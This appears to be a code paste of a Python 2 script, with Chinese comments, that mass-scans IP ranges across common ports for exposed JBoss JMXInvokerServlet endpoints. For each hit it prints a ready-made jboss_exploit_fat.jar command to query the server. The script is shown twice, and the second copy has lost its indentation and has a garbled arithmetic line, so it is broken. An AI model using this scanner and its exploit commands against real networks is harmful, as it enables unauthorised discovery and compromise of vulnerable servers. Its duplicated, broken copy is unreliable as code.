xkon · September 10, 2015 09:04
diff --git a/jmxinvoker_assassin.py b/jmxinvoker_assassin.py
 #!/usr/bin/env python
 # -*- coding=utf-8
 # Jboss JMXInvokerServlet 批量探测脚本
 # usage: ./invoker_assassin.py ipfile.lst
 # ipfile.lst 中保存要批量探测的IP列表，支持CIDR方式
 # 结果保存在result_vuls.lst中
 # By xk0n 2015.09.10

 import sys
 from itertools import product
 import ipaddress
 import time
 from multiprocessing.dummy import Lock, Pool as ThreadPool
 import requests


 class assassin:

    def __init__(self, ipfile, thread_num, ports, path):
        self.ipfile = open(ipfile, 'r')
        self.thread_num = thread_num
        self.ports = ports
        self.vuls = set()
        self.path = path
        self.store_file = 'result_vuls.lst'
        self.lock = Lock()
        self.headers = {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"}

    def _urls(self):
        for line in self.ipfile:
            line = line.strip()
            for ip in ipaddress.ip_network(unicode(line), strict=False):
                for port in self.ports:
                    if port == 80:
                        yield 'http://%s/%s' % (ip, self.path)
                    else:
                        yield 'http://%s:%s/%s' % (ip, port, self.path)

    def run(self, url):
        vul = False
        try:
            r = requests.get(
                url, headers=self.headers, timeout=10, allow_redirects=False)
            if r.status_code == 200:
                if r.headers['content-type'].count('serialized') or r.headers['Content-Type'].count('serialized'):
                    self.lock.acquire()
                    print '[+] maybe vul: %s' % url
                    print '    poc: ./jboss_exploit_fat.jar -i %s get jboss.system:type=ServerInfo OSName' % url
                    self.vuls.add(url)
                    self.lock.release()
                    vul = True
                    return vul
            else:
                return vul
        except:
            return vul

    def multi_assasin(self):
        start = time.time()
        uri = self._urls()
        pool = ThreadPool(self.thread_num)
        results = pool.map(self.run, uri)
        pool.close()
        pool.join()
        with open(self.store_file, 'a') as f:
            for _ in self.vuls:
                f.write(_+'\n')
        print '%s\ttotal vuln site: %s \n used %.2f minutes' % (time.ctime(), len(self.vuls), (time.time()-start)/60.0)

 if __name__ == '__main__':
    ports = [80, 8080, 8081, 8082, 8088, 8888]
    thread_num = 10
    path = 'invoker/JMXInvokerServlet'
    with open(sys.argv[1]) as f:
        counts = 0
        port_count = len(ports)
        for _ in f:
            index = 32-int(_.strip().split('/')[1]) if '/' in _ else 0
            counts += (2**index)*port_count
    print '%s\t\t %s ips| %s cases |%s threads' % (time.ctime(), counts/port_count, counts, thread_num)
    j = assassin(sys.argv[1], thread_num, ports, path)
    j.multi_assasin()
	#!/usr/bin/env python
	# -*- coding=utf-8
	# Jboss JMXInvokerServlet 批量探测脚本
	# usage: ./invoker_assassin.py ipfile.lst
	# ipfile.lst 中保存要批量探测的IP列表，支持CIDR方式
	# 结果保存在result_vuls.lst中
	# By xk0n 2015.09.10

	import sys
	from itertools import product
	import ipaddress
	import time
	from multiprocessing.dummy import Lock, Pool as ThreadPool
	import requests


	class assassin:

	def __init__(self, ipfile, thread_num, ports, path):
	self.ipfile = open(ipfile, 'r')
	self.thread_num = thread_num
	self.ports = ports
	self.vuls = set()
	self.path = path
	self.store_file = 'result_vuls.lst'
	self.lock = Lock()
	self.headers = {
	"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"}

	def _urls(self):
	for line in self.ipfile:
	line = line.strip()
	for ip in ipaddress.ip_network(unicode(line), strict=False):
	for port in self.ports:
	if port == 80:
	yield 'http://%s/%s' % (ip, self.path)
	else:
	yield 'http://%s:%s/%s' % (ip, port, self.path)

	def run(self, url):
	vul = False
	try:
	r = requests.get(
	url, headers=self.headers, timeout=10, allow_redirects=False)
	if r.status_code == 200:
	if r.headers['content-type'].count('serialized') or r.headers['Content-Type'].count('serialized'):
	self.lock.acquire()
	print '[+] maybe vul: %s' % url
	print ' poc: ./jboss_exploit_fat.jar -i %s get jboss.system:type=ServerInfo OSName' % url
	self.vuls.add(url)
	self.lock.release()
	vul = True
	return vul
	else:
	return vul
	except:
	return vul

	def multi_assasin(self):
	start = time.time()
	uri = self._urls()
	pool = ThreadPool(self.thread_num)
	results = pool.map(self.run, uri)
	pool.close()
	pool.join()
	with open(self.store_file, 'a') as f:
	for _ in self.vuls:
	f.write(_+'\n')
	print '%s\ttotal vuln site: %s \n used %.2f minutes' % (time.ctime(), len(self.vuls), (time.time()-start)/60.0)

	if __name__ == '__main__':
	ports = [80, 8080, 8081, 8082, 8088, 8888]
	thread_num = 10
	path = 'invoker/JMXInvokerServlet'
	with open(sys.argv[1]) as f:
	counts = 0
	port_count = len(ports)
	for _ in f:
	index = 32-int(_.strip().split('/')[1]) if '/' in _ else 0
	counts += (2*index)port_count
	print '%s\t\t %s ips\| %s cases \|%s threads' % (time.ctime(), counts/port_count, counts, thread_num)
	j = assassin(sys.argv[1], thread_num, ports, path)
	j.multi_assasin()